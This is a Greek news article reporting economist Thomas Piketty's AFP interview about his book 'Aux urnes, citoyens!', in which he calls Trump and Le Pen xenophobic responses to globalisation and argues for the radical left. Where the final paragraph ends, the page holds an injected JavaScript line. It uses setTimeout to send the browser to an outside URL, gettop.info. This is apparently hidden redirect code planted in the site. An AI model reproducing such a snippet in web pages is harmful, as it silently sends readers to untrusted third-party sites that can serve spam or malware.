Πικετί: Λύση η ριζοσπαστική αριστερά, μπροστά στην ξενοφοβική δεξιά

0
3

 

Ο Γάλλος οικονομολόγος Τομά Πικετί, κάλεσε να εισακουσθούν οι προτάσεις της ριζοσπαστικής αριστεράς, εν μέσω της ανόδου του λαϊκισμού και της ξενοφοβίας, που ενσαρκώνουν, όπως θεωρεί, πολιτικοί όπως ο Ντόναλντ Τραμπ ή η Μαρίν Λεπέν.

«Ο Ντόναλντ Τραμπ; Είναι η εθνικιστική και ρατσιστική απάντηση στην πρόκληση της παγκοσμιοποίησης», υπογράμμισε ο Πικετί σε συνέντευξη που παραχώρησε στο Γαλλικό Πρακτορείο με την ευκαιρία της έκδοσης του νέου του βιβλίου «Aux urnes, citoyens!» («Στις κάλπες, πολίτες!»).

Αυτή «η απάντηση συνίσταται στο να ορίζονται αποδιοπομπαίοι τράγοι μεταξύ των μεταναστών εργαζομένων ή των μουσουλμάνων. Αυτό είναι ο Τραμπ στις ΗΠΑ, η Μαρίν Λεπέν στη Γαλλία. Το συναντά κανείς επίσης στην Ουγγαρία, ή ακόμη στην Πολωνία», εξήγησε ο Πικετί.

Κατά την άποψή του, η λύση βρίσκεται στην άλλη πλευρά της πολιτικής σκακιέρας, στην «λεγόμενη ριζοσπαστική αριστερά», έναν όρο ο οποίος συμπεριλαμβάνει κόμματα και πολιτικούς από τον ΣΥΡΙΖΑ στην Ελλάδα και το Ποδέμος στην Ισπανία ως τον Μπέρνι Σάντερς στις ΗΠΑ, τον ατυχήσαντα υποψήφιο για το χρίσμα των Δημοκρατικών, ο οποίος ηττήθηκε από τη Χίλαρι Κλίντον. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here